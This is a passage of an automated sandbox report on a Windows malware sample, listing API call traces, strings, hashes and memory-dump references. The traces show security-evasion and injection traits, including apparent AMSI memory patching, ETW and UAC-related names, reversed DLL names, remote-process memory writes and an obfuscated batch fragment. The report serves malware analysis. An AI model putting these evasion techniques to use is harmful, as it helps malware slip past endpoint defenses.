QueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
API String ID: 2010126900-181751239
Opcode ID: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
Instruction ID: 6d4ca2bb19920ed03925f197ca0d8a346f314e3bc2c78c9ac32b883bb2ca8568
Opcode Fuzzy Hash: d302ab3202f7e87978f4776264c1707afdf69d7333aaff4ecf7df924c78551a4
Instruction Fuzzy Hash: FC24F975A502688FDB12EB64DD80ADE73B6BF84300F1045E6E50DABA14DE30AE8DDF51

Function 02B47870 Relevance: 160.3, APIs: 5, Strings: 85, Instructions: 2771
processthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02B3881C: LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
Part of subcall function 02B3881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
Part of subcall function 02B3881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879
Part of subcall function 02B3881C: FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02C757DC,02C75820,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B47E31
ResumeThread.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0), ref: 02B4847B
CloseHandle.KERNEL32(00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,00000000,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C), ref: 02B485FA

Part of subcall function 02B38798: LoadLibraryW.KERNEL32(bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize,02B813A4,02B3A774,UacScan), ref: 02B387AC
Part of subcall function 02B38798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B387C6
Part of subcall function 02B38798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000900,00000000,02B813A4,02B3A3BF,ScanString,02B813A4,02B3A774,ScanBuffer,02B813A4,02B3A774,Initialize), ref: 02B38802

CloseHandle.KERNEL32(00000000,00000000,ScanBuffer,02B8137C,02B4AFD0,UacInitialize,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,UacScan,02B8137C), ref: 02B489EC

Part of subcall function 02B27E10: GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B

Part of subcall function 02B3DAC4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02B3DB96), ref: 02B3DB03
Part of subcall function 02B3DAC4: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B3DB3D
Part of subcall function 02B3DAC4: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B3DB6A
Part of subcall function 02B3DAC4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B3DB73

Part of subcall function 02B38184: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B3820E), ref: 02B381F0

ExitProcess.KERNEL32(00000000,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,Initialize,02B8137C,02B4AFD0,00000000,00000000,00000000,ScanString,02B8137C,02B4AFD0), ref: 02B4AA1D

Strings

RtlAllocateHeap, xrefs: 02B49D67, 02B49DCD
SLGetGenuineInformation, xrefs: 02B49592
psapi, xrefs: 02B49882
NtQuerySystemInformation, xrefs: 02B4A099
OpenSession, xrefs: 02B4787C, 02B479F0, 02B47A6C, 02B47D69, 02B47EC2, 02B48068, 02B481F5, 02B48389, 02B48508, 02B4860B, 02B4877F, 02B489FD, 02B48BED, 02B48EDE, 02B49064, 02B4929A, 02B494A0, 02B49664, 02B49953, 02B49A02, 02B49C42, 02B49E39, 02B49F31, 02B4A3E3, 02B4A9AB
NtDeviceIoControlFile, xrefs: 02B4A0A8
NtQueryDirectoryFile, xrefs: 02B4A0B7
RtlQueryProcessDebugInformation, xrefs: 02B4A0C6
dbgcore, xrefs: 02B4899B, 02B489AF
FlushInstructionCache, xrefs: 02B4A2FB
DlpGetWebSiteAccess, xrefs: 02B49C09
DlpNotifyPreDragDrop, xrefs: 02B49B70
NtOpenObjectAuditAlarm, xrefs: 02B4896E
NtWaitForSingleObject, xrefs: 02B49D9A
spp, xrefs: 02B4981C, 02B4984F, 02B4A4EC
NtMapViewOfSection, xrefs: 02B4A6A0
EnumServicesStatusA, xrefs: 02B4A0D5
endpointdlp, xrefs: 02B49B87, 02B49BBA, 02B49BED, 02B49C20
bcrypt, xrefs: 02B499E0
I_QueryTagInformation, xrefs: 02B48982
Advapi, xrefs: 02B4A0DA, 02B4A0E9, 02B4A0F8, 02B4A107, 02B4A143, 02B4A152, 02B4A161
CreateProcessA, xrefs: 02B4A120
CreateProcessWithLogonW, xrefs: 02B4A15C
NtQueryInformationThread, xrefs: 02B4A607
NtWriteVirtualMemory, xrefs: 02B4A7D2
SLLoadApplicationPolicies, xrefs: 02B4962B
LdrLoadDll, xrefs: 02B4A76C
CreateProcessAsUserW, xrefs: 02B4A14D, 02B4A16B
ScanBuffer, xrefs: 02B47C71, 02B47F3E, 02B480E4, 02B48271, 02B48405, 02B48584, 02B487FB, 02B488F3, 02B48D0F, 02B48FE8, 02B4915C, 02B49392, 02B49424, 02B4975C, 02B49AFA, 02B4A029, 02B4A92F
BCryptVerifySignature, xrefs: 02B499C9
ntdll, xrefs: 02B48973, 02B489C3, 02B489D7, 02B49D4B, 02B49D7E, 02B49DB1, 02B49DE4, 02B49E17, 02B4A5B8, 02B4A5EB, 02B4A61E, 02B4A651, 02B4A684, 02B4A6B7, 02B4A6EA, 02B4A71D, 02B4A750, 02B4A783, 02B4A7B6, 02B4A7E9, 02B4A81C, 02B4A84F, 02B4A882
NtOpenSection, xrefs: 02B4A63A
SxTracerGetThreadContextDebug, xrefs: 02B49805, 02B4A4D5
VirtualAllocEx, xrefs: 02B4A22F
psapi, xrefs: 02B4A116
DllGetClassObject, xrefs: 02B49838, 02B4A508
GetProcessMemoryInfo, xrefs: 02B4986B
Initialize, xrefs: 02B478F8, 02B47AE8, 02B48AF5, 02B496E0, 02B49A7E, 02B49FAD, 02B4A367, 02B4A8B3
OpenProcess, xrefs: 02B4A295
kernel32, xrefs: 02B4A213, 02B4A246, 02B4A279, 02B4A2AC, 02B4A2DF, 02B4A312, 02B4A345
NtOpenProcess, xrefs: 02B489D2
SLGetEncryptedPIDEx, xrefs: 02B4A56E
CreateProcessW, xrefs: 02B4A12F
mssip32, xrefs: 02B498B5
EnumServicesStatusExA, xrefs: 02B4A0F3
SLIsGenuineLocalEx, xrefs: 02B495F8
UacScan, xrefs: 02B47B64, 02B47CED, 02B47E46, 02B47FEC, 02B48179, 02B4830D, 02B4848C, 02B48703, 02B48B71, 02B48D8B, 02B48F6C, 02B490E0, 02B49316, 02B4A186
DlpCheckIsCloudSyncApp, xrefs: 02B49BA3
NtOpenFile, xrefs: 02B4A805
C:\Windows\System32\, xrefs: 02B47DFB
WriteVirtualMemory, xrefs: 02B4A2C8
SetUnhandledExceptionFilter, xrefs: 02B4A32E
SLGetSLIDList, xrefs: 02B495C5
advapi32, xrefs: 02B48987
CreateProcessAsUserA, xrefs: 02B4A13E
VirtualAlloc, xrefs: 02B4A1FC
EtwEventWriteEx, xrefs: 02B4A838
EnumProcessModules, xrefs: 02B4A111
SLGatherMigrationBlob, xrefs: 02B4A53B
RtlCreateQueryDebugBuffer, xrefs: 02B49E00
MiniDumpWriteDump, xrefs: 02B48996
NtGetWriteWatch, xrefs: 02B4A5A1
sppwmi, xrefs: 02B4A51F
tquery, xrefs: 02B497E9
EtwEventWrite, xrefs: 02B4A86B
UacInitialize, xrefs: 02B48877, 02B48C93
NtAccessCheck, xrefs: 02B4A739
ScanString, xrefs: 02B47974, 02B47BE0, 02B48687, 02B48A79, 02B48E62, 02B4921E, 02B4951C, 02B498D7, 02B49CBE, 02B49EB5, 02B4A45F
EnumServicesStatusExW, xrefs: 02B4A102
DlpGetArchiveFileTraceInfo, xrefs: 02B49BD6
Ntdll, xrefs: 02B4A09E, 02B4A0AD, 02B4A0BC, 02B4A0CB
NtReadVirtualMemory, xrefs: 02B4A6D3
LdrGetProcedureAddress, xrefs: 02B4A79F
CryptSIPVerifyIndirectData, xrefs: 02B4989E
VirtualProtect, xrefs: 02B4A262
NtSetSecurityObject, xrefs: 02B489BE
NtQuerySecurityObject, xrefs: 02B4A706
NtCreateSection, xrefs: 02B4A66D
NtQueryVirtualMemory, xrefs: 02B4A5D4
Kernel32, xrefs: 02B4A125, 02B4A134, 02B4A170
EnumServicesStatusW, xrefs: 02B4A0E4
MiniDumpReadDumpStream, xrefs: 02B489AA
RetailTracerEnable, xrefs: 02B497D2
sppc, xrefs: 02B495A9, 02B495DC, 02B4960F, 02B49642, 02B4A552, 02B4A585
NtAlertResumeThread, xrefs: 02B49D34

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Library$CloseFileHandle$AddressCreateFreeLoadPathProcProcess$AttributesCacheExitFlushInstructionModuleNameName_ResumeThreadUserWrite
String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
API String ID: 2481178504-1225450241
Opcode ID: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
Instruction ID: e49ed1a94925b7c19387c904880e2041d7018f32ab8e7507339f81a9f34ad271
Opcode Fuzzy Hash: 2b3c76ede034ed0ee09bdfa421ab2afbaa0b07440bc8918fee9bf0f59240d5aa
Instruction Fuzzy Hash: 6543FA75A502688FDB12EB64DD809DE73B6AF84300F1045E6E50EEBA14DE30AE8DDF51

Function 02B21724 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 289
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,02B22000), ref: 02B217D0
Sleep.KERNEL32(0000000A,00000000,?,02B22000), ref: 02B217E6

Strings

) , xrefs: 02B21830, 02B21875, 02B219B9, 02B21A34
0`, xrefs: 02B218AC, 02B218CE, 02B219D8, 02B219EE

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Sleep
String ID: ) $0`
API String ID: 3472027048-916312839
Opcode ID: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
Instruction ID: 7c5f3a25644ed6ebf611e114c42ff20b3baec98efa00132b2af18c46f2bfe774
Opcode Fuzzy Hash: 9de52f03e330f1c44f43be050e076900e70a83814b8bf743001a668f2b839b8a
Instruction Fuzzy Hash: 02B12072A103608BDB15CF2CD880356BBE1EF85394F1886EAE65D8F386D730E559CB90

Function 02B21A8C Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 175
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000000,?,?,00000000,02B21FE4), ref: 02B21B17
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B21FE4), ref: 02B21B31

Strings

0`, xrefs: 02B21BF4, 02B21C3E

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Sleep
String ID: 0`
API String ID: 3472027048-3339448193
Opcode ID: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
Instruction ID: 15f6aa8c18e736209029873f2ff6309f338767204e6b9020b7871a9205268b97
Opcode Fuzzy Hash: a297bb532582eea2dead0f3834fa86ed68ce71cfb470d0296401e5b04c65e6b3
Instruction Fuzzy Hash: D7519D716213608FE715CF6C8988756BBE4EF46314F1886EEE54C8B283E770D549CBA1

Function 02B38704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(amsi), ref: 02B3870D

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C

FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B3876C

Strings

DllGetClassObject, xrefs: 02B38732
amsi, xrefs: 02B38708
W, xrefs: 02B38719

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
String ID: DllGetClassObject$W$amsi
API String ID: 941070894-2671292670
Opcode ID: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
Instruction ID: 37abefbfcc5c8ee36c11fd9ee1d11580322bfdfa4d3143f1c517c61cdc131b6d
Opcode Fuzzy Hash: 5d64c744f737d4c36fb827dc9532959cc4cbb49c1899778a38b492eef03d278d
Instruction Fuzzy Hash: 46F068A054C381B9E202E6748C45F4BBFCE4B52224F448A9DF1E85A2D2DA75D10497B7

Function 02B3E2EE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B3E42E

Strings

Initialize, xrefs: 02B3E31E
ScanBuffer, xrefs: 02B3E377
OpenSession, xrefs: 02B3E3D0

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
Instruction ID: d096c1d191ac557db11252cd9f16b43f3203b39444e2382723f994a6279957dc
Opcode Fuzzy Hash: ef807b0571ce6bb4c34373b662ac0581569047f813d11b172c8a42f20411da7e
Instruction Fuzzy Hash: D4412135B102189FEB02EBA4DC41ADEB3FAEF4C710F1148A6E555B7A50DA74ED098F50

Function 02B3881C Relevance: 6.1, APIs: 4, Instructions: 65
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,00000000,02B38903), ref: 02B38850
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02B38903), ref: 02B38860
GetProcAddress.KERNEL32(74F60000,00000000), ref: 02B38879

Part of subcall function 02B37CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B37D6C

FreeLibrary.KERNEL32(74F60000,00000000,02B81388,Function_000065D8,00000004,02B81398,02B81388,000186A3,00000040,02B8139C,74F60000,00000000,00000000,00000000,00000000,02B38903), ref: 02B388E3

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
String ID:
API String ID: 1543721669-0
Opcode ID: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
Instruction ID: 6746e6d7a2ee8829c2ce62925da09a310af8d5375e1c9a0bc673fc3e8ef8fb9f
Opcode Fuzzy Hash: 50eff430e3eb5ad79b795481d1ff15eef59c9c414066a1f6dba77ab2eddfd947
Instruction Fuzzy Hash: 1D115EB1A51318BFEB01FBA8CC01A5E77AEEB45700F5048E4B60CF7A90DA749D16DB15

Function 02B38406 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

WinExec.KERNEL32(?,?), ref: 02B38470

Strings

Kernel32, xrefs: 02B38453
WinExec, xrefs: 02B38421

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
Instruction ID: 5248a44913d1f95b3415932f54802902e221bda5d31eb823c03394d0ff59fdc0
Opcode Fuzzy Hash: 2678400622ca416fd6e548489f690ef4354d33f3ffc8af8695e591d23c9f204b
Instruction Fuzzy Hash: CB01A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634AD04DE22

Function 02B38408 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02B38018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B38088,?,?,00000000,?,02B379FE,ntdll,00000000,00000000,02B37A43,?,?,00000000), ref: 02B38056
Part of subcall function 02B38018: GetModuleHandleA.KERNELBASE(?), ref: 02B3806A

Part of subcall function 02B380C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
Part of subcall function 02B380C0: GetProcAddress.KERNEL32(?,?), ref: 02B38125

WinExec.KERNEL32(?,?), ref: 02B38470

Strings

Kernel32, xrefs: 02B38453
WinExec, xrefs: 02B38421

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
Instruction ID: aa15607668edd3928571eb1e52a6619f9466bc7e05532dbea38096e55801e32c
Opcode Fuzzy Hash: f2e4eab999c3dbba6705771c0c34a1298baa87a820816fc6fc720bac6e52c443
Instruction Fuzzy Hash: 75F0A439654304BFEB02EFA8DC41F5A77EDE748710F5184A0B508D7E50D634A904DE22

Function 02B35BAC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C08
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C36

Part of subcall function 02B27D10: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B33880,02B35C76,00000000,02B35CF4,?,?,02B33880), ref: 02B27D5E

Part of subcall function 02B27F18: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B33880,02B35C91,00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B27F37

GetLastError.KERNEL32(00000000,02B35CF4,?,?,02B33880,00000001), ref: 02B35C9B

Part of subcall function 02B2A6F8: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B2C359,00000000,02B2C3B3), ref: 02B2A717

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
Instruction ID: 679de02c7d1e6923f602fde8100a4eae514b70061ba55b019b93c06bb71eb56c
Opcode Fuzzy Hash: 0d4d53a1d4632ce329ab578801f9b964810193524102552871df7e031314d89d
Instruction Fuzzy Hash: AD317270A003149FDB11EFA8C88179EB7F6AF48314F9084A5E518AB380DB755A498FA5

Function 02B3E6B6 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

